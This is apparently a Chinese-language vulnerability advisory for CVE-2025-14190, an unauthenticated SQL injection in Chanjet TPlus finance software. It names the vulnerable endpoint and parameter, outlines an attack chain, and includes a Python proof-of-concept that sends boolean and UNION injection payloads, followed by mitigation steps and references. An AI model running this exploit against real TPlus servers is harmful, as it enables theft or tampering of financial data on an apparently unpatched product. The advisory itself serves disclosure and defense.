CVE-2025-14190: Chanjet TPlus SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14190

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Chanjet TPlus

漏洞概述

CVE-2025-14190是畅捷通TPlus财务管理软件中的一个高危SQL注入漏洞。该漏洞存在于Web接口/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx的Load方法中，攻击者可通过currentAccId参数注入恶意SQL代码。由于该接口未对用户输入进行充分的参数过滤和SQL语句预编译，攻击者可以在无需认证的情况下远程利用此漏洞。此漏洞的CVSS评分为7.3，属于高危级别，对系统的机密性、完整性和可用性均造成一定影响。攻击者成功利用此漏洞可窃取数据库中的敏感财务数据、修改业务数据，甚至在某些配置下可能获得服务器操作权限。该漏洞已于2025年12月7日公开披露，厂商在收到安全通知后未做出任何回应。

技术细节

该SQL注入漏洞位于畅捷通TPlus的MultiCompanySettingController控制器中，具体接口路径为：/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load。漏洞根源在于currentAccId参数的用户输入未经过安全处理就直接拼接到SQL查询语句中。攻击者可利用UNION SELECT、布尔盲注、时间盲注等SQL注入技术提取数据库中的敏感信息。由于该接口是ajaxpro异步请求接口，通常用于前端动态加载多账套设置信息，因此攻击者可以利用此漏洞获取数据库结构信息、财务数据、用户凭证等敏感数据。漏洞利用无需任何认证，攻击者可远程发起攻击，攻击复杂度低，威胁程度较高。

攻击链分析

STEP 1

步骤1

识别目标：扫描畅捷通TPlus系统，确认存在/tplus/ajaxpro/路径的Web服务

STEP 2

步骤2

构造恶意请求：构建包含SQL注入载荷的currentAccId参数请求

STEP 3

步骤3

发送攻击载荷：通过POST请求向Load接口发送SQL注入payload

STEP 4

步骤4

提取数据：利用UNION SELECT或盲注技术从数据库中提取敏感信息

STEP 5

步骤5

权限提升：根据数据库类型和配置，可能进一步获取系统操作权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14190 SQL Injection PoC for Chanjet TPlus
# Target: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx

def exploit_sql_injection(target_url, payload):
    """
    Exploit SQL injection vulnerability in Chanjet TPlus currentAccId parameter
    """
    params = {
        'method': 'Load'
    }
    
    # Malicious payload in currentAccId parameter
    data = {
        'currentAccId': payload
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-AjaxPro-Method': 'Load'
    }
    
    try:
        response = requests.post(
            target_url,
            params=params,
            data=data,
            headers=headers,
            timeout=30
        )
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"

# Example payloads
if __name__ == "__main__":
    target = "http://target.com/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx"
    
    # Boolean-based blind SQL injection
    payload = "1' AND 1=1--"
    print("Testing boolean-based injection...")
    result = exploit_sql_injection(target, payload)
    print(result)
    
    # UNION-based injection to extract database version
    union_payload = "1' UNION SELECT @@version--"
    print("Extracting database version...")
    result = exploit_sql_injection(target, union_payload)
    print(result)

影响范围

Chanjet TPlus <= 2025-11-21

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 通过网络层访问控制限制对/tplus/ajaxpro/路径的访问，仅允许受信任的IP地址访问；2) 在Web应用防火墙中配置SQL注入防护规则，阻断包含SQL关键字的请求；3) 临时禁用MultiCompanySettingController的Load方法功能；4) 加强数据库监控，及时发现异常SQL查询行为；5) 定期备份数据库，确保数据安全。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14190
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14190
3 Details https://www.cvedetails.com/cve/CVE-2025-14190/
4 VulDB https://vuldb.com/cve/CVE-2025-14190
5 Link https://github.com/hacker-routing/Changjetong-T-/issues/1
6 Link https://github.com/hacker-routing/Changjetong-T-/issues/1#issue-3646765351
7 Link https://vuldb.com/?ctiid.334610
8 Link https://vuldb.com/?id.334610
9 Link https://vuldb.com/?submit.699144